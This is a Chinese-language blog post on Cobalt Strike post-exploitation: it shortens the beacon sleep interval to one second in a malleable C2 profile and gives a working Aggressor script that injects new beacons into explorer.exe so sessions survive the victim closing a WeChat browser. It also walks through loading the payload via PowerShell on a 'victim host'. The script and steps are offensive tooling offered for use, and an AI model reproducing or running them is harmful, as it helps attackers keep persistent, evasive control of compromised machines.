Cobalt strike上线后自动迁移进程

    Cobalt strike 内网渗透   Cobalt strike 内网渗透

0x00 前言

通过cs上线之后之后担心掉线,所以有改文章。通过进程注入方式,当有新的主机上线之后将进程注入explorer.exe进程中

0x01 解决上述问题

  1. 加载自定义 malleable C2 配置文件 从而达到主机一上线跳默认为 1 秒,就可自动在目标打开浏览器短暂的时间里尽快转移进程

  2. 加载一个 Cobalt Strike automigrate 自动迁移进程的插件从而达到目标上线后会话自动迁移到其他进程从而我们就可以脱离微信浏览器的束缚

0x02 具体操作方法

加载自定义 malleable C2 配置文件

https://github.com/threatexpress/malleable-c2

在此项目上找到你 cs 版本对应的配置文件,我这里用的 4.2 各版本差别不大

默认时间为45s,修改配置文件将文件修改心跳时间为1s,用于快速迁移进程

image-20220205130403508

时间不注释启动会报错,所以将他注释掉

image-20220205130711661

报错信息如下

image-20220205130739277

启动cs服务端

image-20220205130811432

cs客户端配置cna插件

加载一个 Cobalt Strike automigrate 自动迁移进程的插件

on beacon_initial
{
 sub callback
 {
  $regex = '(.*\n)+explorer.exe\t\d+\t(\d+)(.*\n)+';
  $listener = "adtest";
  if ($2  ismatch $regex)
  {
   $pid = matched()[1];
   $inject_pid = $pid;
   if (-is64 $1)
   {
    $arch = "x64";
   }
   else
   {
    $arch = "x86";
   }
   binject($1, $pid, $listener, $arch);
  }
 }
 if($inject_pid != beacon_info($1,"pid"))
 {
  bps($1, &callback);
 }
}

代码中的$listener = “adlab-doamin"为监听器的名称

image-20220205142817934

加载迁移进程插件

image-20220205131009491

通过powershell加载脚本

image-20220205145009243

image-20220205145027684

复制到受害者主机执行

image-20220205145101639

image-20220205145305735

cs成功上线并自动迁移进程

image-20220205144854627

0x03 参考地址

https://ailiqun.xyz/2021/04/18/%E8%B0%B7%E6%AD%8C%E6%B5%8F%E8%A7%88%E5%99%A8-v8-%E5%9C%A8%E5%BE%AE%E4%BF%A1%E4%B8%8A%E7%9A%84%E5%BA%94%E7%94%A8/
https://www.cnblogs.com/sunny11/p/14755923.html

AD钙奶

Good Good Study, Day Day Up~